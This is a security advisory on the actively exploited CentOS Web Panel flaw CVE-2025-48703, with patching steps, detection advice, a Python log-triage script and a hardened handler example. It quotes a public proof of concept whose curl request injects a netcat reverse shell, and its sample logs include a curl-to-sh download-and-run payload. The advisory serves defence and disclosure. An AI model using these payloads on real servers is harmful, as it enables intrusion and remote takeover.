- November 6, 2025
CentOS Web Panel Vulnerability Under Active Exploitation (CVE-2025-48703)
On November 4th, the Cybersecurity and Infrastructure Security Agency (CISA) added a critical vulnerability within CentOS Web Panel (CWP) to its known exploited vulnerabilities (KEV) database, meaning it is being actively exploited in the wild.
Executive Summary
CWP is a web-based utility leveraged by administrators to manage Linux servers and underlying network services and has broad exposure on the internet. The flaw within this utility is officially tracked as CVE-2025-48703 and allows an unauthenticated attacker with knowledge of a valid non-root username to compromise the hosting server, potentially giving them full control of the system.
At the time of this advisory, CISA has not publicly disclosed how the vulnerability is being exploited in the wild. However, given that a public proof of concept (PoC) exists and exploitation is trivial, Beazley Security recommends that affected organizations immediately apply the latest security patches and review exposed systems for signs of compromise.
Affected Systems or Products
CentOS Web Panel versions prior to 0.9.8.1205 are vulnerable to authentication bypass and unauthenticated remote code execution. Please see the table below and the Mitigations section for guidance on how to reduce the risk of this vulnerability.
| Software | Affected Versions | Fixed Versions |
| --- | --- | --- |
| CentOS Web Panel | < 0.9.8.1205 | 0.9.8.1205 or later |
Mitigations / Workarounds
Beazley Security strongly recommends affected organizations upgrade CWP to versions 0.9.8.1205 or later. If patching cannot be immediately performed, the following steps may help to reduce risk:
Restrict network access to the CWP interfaces to trusted management networks. These are typically served on ports 2083 (user panel) and 2087 (admin panel), but specific deployments should be reviewed for accuracy. Note that the public PoC targets the user panel (the /<user>/ path on port 2083), so restricting only the admin port does not remove the exposure.
Deploy the panel behind a web application firewall (WAF) configured to detect or block POST requests to module=filemanager&acc=changePerm whose t_total value is anything other than three or four octal digits. See the Technical Details section of this report for more information.
Review authentication logs, web access logs, and outbound network activity from the server for indicators of exploitation.
Patches
The vendor has addressed this vulnerability in CWP versions 0.9.8.1205 or later; the CWP changelog (see Sources) can be followed for future update announcements.
According to the CWP update wiki, CWP has an automatic update routine run from crontab that may take up to 48 hours to pick up the fix. System administrators can obtain the fixed build sooner by running the built-in update script, using either of the following commands from the CWP update wiki:
sh /usr/local/cwpsrv/htdocs/resources/scripts/update_cwp
OR
sh /scripts/update_cwp
Affected organizations should restart the CWP services after the update has run so that no legacy instance of the panel remains in memory, and should confirm the panel reports version 0.9.8.1205 or later.
Indicators of Compromise
Although CISA has not released the specifics of this attack or how the vulnerability is being exploited, the following steps can be taken to identify indicators of attack or compromise:
Check CWP Web Access Logs:
Review for POST requests to the file manager endpoint (module=filemanager&acc=changePerm), in particular requests from clients that never authenticated or that carry no valid session.
Review for requests whose t_total value is not a numeric octal mode, for example values containing backticks, $(...), or shell commands such as nc or curl. Note that t_total is sent in the POST body, which a standard web access log does not record; this check requires WAF or request-body logging. See the Technical Details section for more information.
Review System Activity:
Unexpected execution of chmod, bash, curl, wget, or nc (netcat) originating from the CWP web process user.
Unusual outbound network connections to external IPs or high numbered (ephemeral) ports that could indicate reverse shell activity.
Newly created and modified files within home directories of CWP users on the system, or evidence of downloaded payloads and binaries into these directories.
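As an added example (written for this advisory; it is not code from Beazley Security, CWP or Fenrisk), the following Python script implements the two web-log checks above over constructed log lines. It assumes the requests were recorded by a WAF or reverse proxy that logs the decoded POST body beside the request line; on a plain access log, which carries no body, only the endpoint match applies. The log format, the IP addresses and the request bodies are constructed for illustration.

```python
"""Triage CWP request logs for the CVE-2025-48703 exploitation pattern.

Added example written for this advisory, not code from Beazley Security, CWP or
Fenrisk. It assumes a WAF or reverse proxy that logs the request line together
with the decoded POST body (a plain access log has no body, so only the
endpoint match applies there). The log format and the log lines are
constructed for illustration.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed format: <client ip> "<METHOD> <path?query>" <status> body="<form body>"
SAMPLE_LOG = """\
203.0.113.10 "POST /myuser/index.php?module=filemanager&acc=changePerm" 200 body="fileName=.bashrc&currentPath=/home/myuser/&t_total=644"
203.0.113.10 "POST /myuser/index.php?module=filemanager&acc=changePerm" 200 body="fileName=.bashrc&currentPath=/home/myuser&t_total=%60nc+1.2.3.4+9999+-e+%2Fbin%2Fbash%60"
198.51.100.7 "POST /myuser/index.php?module=filemanager&acc=changePerm" 200 body="fileName=x&currentPath=%2Fhome%2Fmyuser&t_total=755+%24%28curl+http%3A%2F%2F198.51.100.7%2Fp.sh%7Csh%29"
203.0.113.10 "GET /myuser/index.php?module=filemanager&acc=list" 200 body=""
192.0.2.5 "POST /login/index.php" 302 body="username=myuser&password=REDACTED"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" (?P<status>\d{3}) body="(?P<body>[^"]*)"$'
)
OCTAL_MODE = re.compile(r"[0-7]{3,4}")   # the only legitimate shape for t_total


def is_change_perm(target):
    """True when the query string selects the vulnerable file-manager action."""
    q = parse_qs(urlparse(target).query)
    return q.get("module") == ["filemanager"] and q.get("acc") == ["changePerm"]


def classify(line):
    """Return a finding dict for a POST to changePerm, otherwise None."""
    m = LINE_RE.match(line)
    if not m or m["method"] != "POST" or not is_change_perm(m["target"]):
        return None
    path = urlparse(m["target"]).path
    user = path.split("/")[1] if path.count("/") >= 2 else ""   # /<user>/index.php
    body = parse_qs(m["body"], keep_blank_values=True)
    t_total = body.get("t_total", [""])[0]
    if t_total and not OCTAL_MODE.fullmatch(t_total):
        verdict = "command_injection"      # shell metacharacters reach chmod
    else:
        # A well-formed mode is still worth review: on vulnerable builds the
        # endpoint accepts it without a session, which the log cannot show.
        verdict = "review"
    return {"ip": m["ip"], "user": user, "status": m["status"],
            "t_total": t_total, "verdict": verdict}


def triage(lines):
    """Run classify() over every line and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f is not None]


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG.splitlines()):
        print(f"{f['verdict']:18} {f['ip']:15} user={f['user']} t_total={f['t_total']!r}")
```

Feed it real WAF or proxy lines by adapting LINE_RE to the local format; the decision logic (endpoint match, then octal check on t_total) is the same rule the WAF mitigation above should enforce, so the two stay consistent.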
Technical Details
CWP provides an interface for managing hosting environments without touching server configuration at the OS level, and it is often exposed to the internet so that hosting customers can reach it.
The vulnerability is an authentication bypass in the CWP user panel. Specifically, the flaw documented by fenrisk lies in the file manager's permission-change feature, which lets a user set read, write, and execute bits on a file and uses the OS-level chmod utility on the backend to apply them. The endpoint that performs this change, reachable at /<user>/index.php?module=filemanager&acc=changePerm, does not verify that the caller is authenticated, so an attacker who knows or can guess a valid non-root username can invoke it directly. The following request, taken from fenrisk's write-up, bypasses authentication on vulnerable versions:
curl -kis 'https://127.0.0.1:2083/<user>/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/<user>/&t_total=644'
In the example above, t_total carries the numeric mode that the CWP file manager passes to chmod on the server. Building on the authentication bypass, remote code execution follows from a sanitization flaw in the same parameter: its value is inserted unescaped into the chmod command line that the panel runs through the system shell, so shell metacharacters such as backticks are expanded before chmod ever executes. Fenrisk's PoC below (run against a test instance listening on port 52083 rather than the default 2083) uses this to invoke netcat for an outbound shell:
$ curl -kis 'https://127.0.0.1:52083/myuser/index.php?module=filemanager&acc=changePerm' --data 'fileName=.bashrc&currentPath=/home/myuser&t_total=`nc 1.2.3.4 9999 -e /bin/bash`'
If successful, the attacker could compromise the server and achieve a remote shell or build on this PoC to invoke the server to download malicious payloads.
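To make the two defects concrete, the following is an added illustration in Python, written for this page; it is not CWP's PHP source and does not claim to reproduce it. It models a handler that assembles the chmod command the way the text describes, beside a hardened version that checks the session, validates t_total as an octal mode, confines the target path to the user's home directory, and calls chmod directly instead of through a shell. The names Session, change_perm_vulnerable, change_perm_hardened and home_root, and the throwaway home directory the demo creates, are assumptions for this example.

```python
"""Vulnerable pattern beside a hardened handler for a "change permissions" action.

Added example written for this advisory; it is not CWP's PHP source and does not
claim to reproduce it. It models the two defects the text describes (no
authentication check on the endpoint; t_total interpolated into a chmod shell
command unescaped) and the controls that close them. Session,
change_perm_vulnerable, change_perm_hardened and home_root are assumed names.
"""
import os
import re
import stat
import tempfile
from dataclasses import dataclass
from pathlib import Path
from typing import Optional


@dataclass
class Session:
    user: Optional[str]          # None models a request with no valid session


def change_perm_vulnerable(user, current_path, file_name, t_total):
    """Build the command a vulnerable handler would hand to `sh -c`.

    There is no session check, and t_total is spliced in verbatim, so a value
    such as `nc 1.2.3.4 9999 -e /bin/bash` is expanded by the shell before
    chmod runs. Deliberately returns the string instead of executing it.
    """
    return f"chmod {t_total} {current_path}/{file_name}"


def change_perm_hardened(session, user, current_path, file_name, t_total, home_root="/home"):
    """Change a file mode only for an authenticated user, with a validated octal
    mode, on a path confined to that user's home. Returns the resulting mode."""
    # 1. Authentication: the request must carry a session for this panel user.
    if session.user is None or session.user != user:
        raise PermissionError("not authenticated as this user")
    # 2. Input validation: only 3 or 4 octal digits; no shell ever sees the value.
    if not re.fullmatch(r"[0-7]{3,4}", t_total):
        raise ValueError("t_total must be an octal mode such as 644")
    if "/" in file_name or file_name in ("", ".", ".."):
        raise ValueError("file_name must be a plain file name")
    # 3. Path confinement: resolve symlinks and '..' before comparing against home.
    base = (Path(home_root) / user).resolve()
    target = (Path(current_path) / file_name).resolve()
    if not target.is_relative_to(base):
        raise PermissionError("path escapes the user's home directory")
    os.chmod(target, int(t_total, 8))     # direct syscall, no shell involved
    return stat.S_IMODE(os.stat(target).st_mode)


def make_demo_home():
    """Constructed fixture: a throwaway home_root containing myuser/.bashrc."""
    root = tempfile.mkdtemp(prefix="cwp-demo-")
    Path(root, "myuser").mkdir()
    Path(root, "myuser", ".bashrc").touch()
    return root


def _outcome(fn, *args, **kwargs):
    """Return the function result, or the name of the exception that stopped it."""
    try:
        return fn(*args, **kwargs)
    except Exception as exc:
        return type(exc).__name__


def demo():
    """Run PoC-style inputs through both handlers and collect the outcomes."""
    root = make_demo_home()
    home = f"{root}/myuser"
    payload = "`nc 1.2.3.4 9999 -e /bin/bash`"
    return {
        "vulnerable_cmd": change_perm_vulnerable("myuser", "/home/myuser", ".bashrc", payload),
        "ok": _outcome(change_perm_hardened, Session("myuser"), "myuser", home, ".bashrc", "600", home_root=root),
        "unauth": _outcome(change_perm_hardened, Session(None), "myuser", home, ".bashrc", "644", home_root=root),
        "injection": _outcome(change_perm_hardened, Session("myuser"), "myuser", home, ".bashrc", payload, home_root=root),
        "traversal": _outcome(change_perm_hardened, Session("myuser"), "myuser", f"{home}/../other", ".bashrc", "644", home_root=root),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:15} {oct(value) if isinstance(value, int) else value}")
```

The order of the checks matters: the session check runs first so that an unauthenticated caller learns nothing about which paths or modes are accepted, and the mode is validated as a fixed-shape octal string rather than escaped, so there is no shell command left to inject into.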
Fenrisk’s public PoC code was released in June 2025, and CISA’s recent KEV listing signals that threat actors are now actively leveraging the flaw to gain remote access to vulnerable CWP deployments.
Beazley Security's exposure management data shows widespread exposure of the web panel across the internet. Given the ease of exploitation, the breadth of exposure, and confirmed in-the-wild activity, affected organizations should ensure they have upgraded to version 0.9.8.1205 or later.
How Beazley Security is responding
Beazley Security is monitoring client perimeter devices through our Exposure Management Platform to identify impacted devices and support organizations in remediation of any issues found.
We are also conducting threat hunts across our MDR environment to detect potential exploitation attempts against our clients.
If you believe your organization may have been impacted by this attack campaign and need support, please contact our Incident Response team.
Sources
Fenrisk PoC [https://fenrisk.com/rce-centos-webpanel]
CWP Changelog [https://control-webpanel.com/changelog]
CWP Update Wiki [https://wiki.centos-webpanel.com/how-to-update-cwp]
CISA KEV Entry [https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-48703]